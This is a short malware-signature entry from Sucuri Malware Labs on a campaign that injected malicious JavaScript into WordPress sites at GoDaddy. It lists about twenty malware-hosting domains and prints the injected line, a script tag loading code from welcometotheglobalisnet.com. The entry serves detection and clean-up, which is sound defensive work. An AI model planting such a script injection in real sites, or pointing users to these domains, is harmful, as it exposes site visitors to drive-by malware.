Sucuri Malware Labs

Description:

Code used to insert a malicious javascript on many WordPress sites hosted at GoDaddy. The malicious code is added to all PHP files (or the database), infecting each post. Loads the malware from:

http://welcometotheglobalisnet.com/js.php?kk=25<br /> http://www3.incredible-protectionro.rr.nu<br /> www3.aboutavsoft.com<br /> www3.first-guardul.cz.cc<br /> www3.first-security-checker.com<br /> www3.incredible-protectionro.rr.nu<br /> www3.netprotectionsoftre.com<br /> www3.save-internet-foru.com<br /> www3.simpleclean-foru.net<br /> www3.smart-security-holder.in<br /> www3.smartsuite-4u.in<br /> www3.top-network-guard.in<br /> www3.top-scan-foru.in<br /> www3.topsuitesentinel.rr.nu<br /> www4.first-internetmaster.net<br /> www4.goodghtsafe.rr.nu<br /> www4.seeeresafe.in<br /> www4.seefredsafe.in<br /> www4.smartinternet-foryou.net<br /> www4.top-only-scanner.uni.cc

Generally infecting all WordPress posts. More details here: http://blog.sucuri.net/2011/02/hilary-kneber-godaddy-and-welcometotheglobalisnet-com.html

Clean up:

Contact support@sucuri.net.

Malware dump (base 64 added to the .php files):

<script src=`http://welcometotheglobalisnet.com/js.php?kk=25`>

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb